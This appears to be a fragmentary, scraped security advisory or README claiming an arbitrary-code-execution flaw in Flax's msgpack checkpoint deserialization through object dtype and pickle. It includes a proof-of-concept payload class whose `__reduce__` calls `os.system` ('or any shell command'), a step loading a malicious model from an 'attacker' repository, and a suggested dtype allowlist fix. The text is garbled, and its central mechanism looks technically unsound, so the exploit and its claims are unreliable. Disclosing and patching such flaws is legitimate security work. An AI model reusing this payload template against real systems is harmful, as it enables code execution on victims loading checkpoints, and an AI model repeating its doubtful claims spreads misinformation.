Views
No views yet
'O') internally uses pickle for serialization. By injecting object dtype in msgpack payloads, attackers can:flax/serialization.py (Lines 262-275)1def _dtype_from_name(name: str):
2 if name == b'bfloat16':
3 return jax.numpy.bfloat16
4 else:
5 return np.dtype(name) # ❌ ACCEPTS ARBITRARY DTYPES!
6
7def _ndarray_from_bytes(data: bytes) -> np.ndarray:
8 shape, dtype_name, buffer = msgpack.unpackb(data, raw=True)
9 return np.frombuffer(
10 buffer, dtype=_dtype_from_name(dtype_name) # ❌ Includes 'O' (object)!
11 ).reshape(shape, order='C')'O' which uses pickle!1# 1. Create malicious object
2class MaliciousPayload:
3 def __reduce__(self):
4 return (os.system, ('calc.exe',)) # Or any shell command
5
6# 2. Serialize with object dtype
7arr = np.array([MaliciousPayload()], dtype=object)
8buffer = pickle.dumps(arr) # NumPy uses pickle for object dtype!
9
10# 3. Craft msgpack payload
11payload = msgpack.packb((
12 (1,), # shape
13 b'O', # dtype='O' (object) → triggers pickle!
14 buffer # pickled malicious object
15))
16
17# 4. Victim loads checkpoint
18flax.serialization.msgpack_restore(payload)
19# → NumPy unpickles object
20# → MaliciousPayload.__reduce__() executes
21# → ARBITRARY CODE EXECUTION!pickle.load() → Not found in Flax codehf.download("attacker/malicious-gpt")flax.serialization.msgpack_restore(checkpoint)python3 poc_05_pickle_bypass_ace.py1ALLOWED_DTYPES = frozenset([
2 'float16', 'float32', 'float64',
3 'int8', 'int16', 'int32', 'int64',
4 'uint8', 'uint16', 'uint32', 'uint64',
5 'bool', 'bfloat16'
6])
7
8def _dtype_from_name(name: str):
9 if name == b'bfloat16':
10 return jax.numpy.bfloat16
11
12 # ✅ ADD THIS CHECK:
13 dtype_str = name.decode() if isinstance(name, bytes) else name
14 if dtype_str not in ALLOWED_DTYPES:
15 raise ValueError(f"Forbidden dtype: {dtype_str}")
16
17 return np.dtype(name)poc_05_pickle_bypass_ace.py - CRITICAL ACE proof-of-conceptREADME.md - This file